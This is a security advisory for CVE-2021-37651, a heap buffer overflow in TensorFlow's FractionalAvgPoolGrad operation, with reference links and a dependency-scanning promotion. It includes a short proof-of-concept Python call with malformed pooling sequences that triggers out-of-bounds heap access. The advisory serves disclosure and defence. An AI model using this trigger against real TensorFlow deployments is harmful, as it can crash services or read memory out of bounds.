CVE-2021-37651: Heap buffer overflow in `FractionalAvgPoolGrad`
(updated )
The implementation for tf.raw_ops.FractionalAvgPoolGrad can be tricked into accessing data outside of bounds of heap allocated buffers:
import tensorflow as tf
tf.raw_ops.FractionalAvgPoolGrad(
orig_input_tensor_shape=[0,1,2,3],
out_backprop = np.array([[[[541],[541]],[[541],[541]]]]),
row_pooling_sequence=[0, 0, 0, 0, 0],
col_pooling_sequence=[-2, 0, 0, 2, 0],
overlapping=True)
References
- github.com/advisories/GHSA-hpv4-7p9c-mvfr
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-564.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-762.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-273.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/0f931751fb20f565c4e94aa6df58d54a003cdb30
- github.com/tensorflow/tensorflow/security/advisories/GHSA-hpv4-7p9c-mvfr
- nvd.nist.gov/vuln/detail/CVE-2021-37651
Detect and mitigate CVE-2021-37651 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →